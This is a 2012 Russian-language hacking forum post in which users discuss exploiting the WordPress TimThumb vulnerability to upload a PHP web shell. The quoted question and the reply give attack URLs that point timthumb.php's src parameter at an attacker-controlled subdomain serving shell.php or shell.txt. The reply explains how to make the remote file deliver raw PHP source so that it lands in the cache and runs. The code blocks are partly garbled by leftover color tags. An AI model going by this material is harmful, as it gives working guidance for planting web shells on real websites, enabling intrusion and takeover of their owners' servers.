13.06.2012, 13:53
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
С нами:
8738995
Репутация:
1
|
|
Сообщение от promarketing
Word press TimThumb Уязвимость
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable
Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл
Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
Тебе нужен не выполненный php скрипт, а сорцы т.е. ты когда заходишь на http://site.com/index.php , где index.php содержит :
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
ты видишь слово "привет", т.е. результат скрипта, а не сорцы => попробуй :
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]themes[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]theme[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]scripts[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]timthumb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//blogger.com.site.com/shell.txt[/COLOR][/COLOR]
Или нужно, чтоб у тебя в настройках http://blogger.com.site.com/ не исполнялиь php-скрипты (другой хостинг, типа narod.ru)
Другими словами если ты зайдешь на http://site.narod.ru/index.php , с тем же содержанием ты увидишь не исполненный скрипт, а собственно сорцы:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|